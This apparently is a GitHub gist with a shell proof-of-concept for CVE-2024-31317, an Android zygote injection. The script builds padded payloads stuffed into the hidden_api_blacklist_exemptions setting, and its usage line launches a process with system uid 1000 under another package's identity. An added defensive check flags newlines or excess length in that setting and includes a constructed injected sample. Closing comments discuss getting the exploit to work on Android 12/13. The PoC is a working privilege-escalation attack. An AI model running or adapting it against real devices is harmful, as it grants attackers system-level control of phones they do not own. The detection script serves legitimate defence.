Created July 13, 2024 17:27
CVE-2024-31317 PoC 2
```sh
#!/bin/sh
# PoC prepares the payload of commands to execute through the zygote injection CVE-2024-31317:
# https://rtx.meta.security/exploitation/2024/06/03/Android-Zygote-injection.html
#
# USAGE (android 13, with pre-13 use 12200 instead of 32768):
# host$ adb push payload.sh /sdcard/
# host$ adb shell
# shell$ logcat -c; settings put global hidden_api_blacklist_exemptions "$(sh /sdcard/payload.sh 8192 32768 \
#   --runtime-args --setuid=1000 --setgid=1000 --runtime-flags=16787456 --mount-external-default --target-sdk-version=22 \
#   --setgroups=3003 --nice-name=com.android.settings --seinfo=platform:privapp:targetSdkVersion=33:complete \
#   --instruction-set=x86 --app-data-dir=/data/user/0/jackpal.androidterm --package-name=jackpal.androidterm --is-top-app \
#   android.app.ActivityThread seq=40)"; logcat

# Getting the values from parameters
buffer_size=$1
shift
zygote_read_abort_size=$1
shift
zygote_args_len=$#

# What's predefined in the executed command when execute `settings put global hidden_api_blacklist_exemptions <val>`
prefix="6 --set-api-denylist-exemptions "
prefix_len=$(echo -n "$prefix" | wc -c)
add_chars=$(($buffer_size - $prefix_len + 2))

# For tests: echo the prefix, delete from prod:
#echo "6\n--set-api-denylist-exemptions"

# Making pad to fill the first buffer and amount should go in the next buffer
payload=$(printf "\n\n\n\n\n%${add_chars}s" $zygote_args_len | tr ' ' A)

# Printing each zygote argument to run
for arg in "$@"; do
  payload="$payload\n$(echo "$arg")"
done
echo "$payload"

payload_len=$(echo "$payload" | wc -c)
echo -n ,,,,
add_chars=$(($buffer_size*2 - ($prefix_len + $payload_len) - 1))
printf "%${add_chars}s" 'X' | tr ' ' 'X'
echo E
```
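Added here as a defensive counterpart to the PoC, not code from the gist or from the write-ups it links: a POSIX sh check that flags a `hidden_api_blacklist_exemptions` value containing an embedded newline or an unusual length, the two properties the payload above depends on to get extra lines into the zygote command. The `MAX_LEN` threshold, the function names, and the two sample values are assumptions constructed for this example; `audit_device` uses the real `settings get` command and is meant to run inside `adb shell`.

```sh
#!/bin/sh
# Added example, not part of the gist. The PoC stores newlines and a long run
# of padding in the global setting hidden_api_blacklist_exemptions so that the
# value is read as additional zygote command lines. A legitimate value is one
# line of comma-separated signatures (or "*"). This check flags anything else.
# MAX_LEN is an assumed threshold, not a documented Android limit.
MAX_LEN=4096

# Literal newline, built portably (command substitution strips trailing
# newlines, hence the sentinel character that is removed afterwards).
NL=$(printf '\nx'); NL=${NL%x}

# check_exemptions_value VALUE
# Prints a verdict; returns 0 for a benign-looking value, 1 for a suspicious one.
check_exemptions_value() {
    _v=$1
    case $_v in
        *"$NL"*)
            echo "SUSPICIOUS: embedded newline in hidden_api_blacklist_exemptions"
            return 1 ;;
    esac
    if [ "${#_v}" -gt "$MAX_LEN" ]; then
        echo "SUSPICIOUS: value is ${#_v} chars (limit $MAX_LEN)"
        return 1
    fi
    echo "ok: single line, ${#_v} chars"
    return 0
}

# Reads the live value on a device; run this inside `adb shell`.
# `settings get` prints "null" when the setting is unset, which passes the check.
audit_device() {
    check_exemptions_value "$(settings get global hidden_api_blacklist_exemptions)"
}

# Constructed sample values for running this file off-device.
BENIGN_SAMPLE='Landroid/os/SystemProperties;->get(Ljava/lang/String;)Ljava/lang/String;'
INJECTED_SAMPLE="6${NL}--set-api-denylist-exemptions${NL}--runtime-args"

# Demo run: `sh check_exemptions.sh --demo` (hypothetical file name).
if [ "${1:-}" = "--demo" ]; then
    check_exemptions_value "$BENIGN_SAMPLE"
    check_exemptions_value "$INJECTED_SAMPLE" || true
fi
```

The newline test is the decisive one: the zygote socket protocol treats each line of the forwarded value as a separate argument, so any newline inside this setting is a red flag regardless of length, while the length check only catches the padding the PoC needs to reach the next read buffer.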
Author
Well, if I can ensure that it's the same commands as A11 that are known to work, what is missing in A12/13? Can the padding be excessive?
I guess you were not able to implement this to the letter?
https://blog.flanker017.me/cve-2024-31317/
@rabits
How about this site:
https://github.com/agg23/cve-2024-31317/blob/master/explanation.md
On Android >11 there are additional measures implemented which need to be mitigated. It crashes zygote if done improperly (not correct commands or padding; you can find that if you check the zygote crash output). The maximum I was able to achieve is to execute a command, then it passed into zygote, but I was never able to properly execute a second one to steal its pid. I suppose precise timing & control is needed, or I'm missing something crucial. And yeah, after every execution of the PoC I had to reboot the device, otherwise zygote stays in this corrupted state...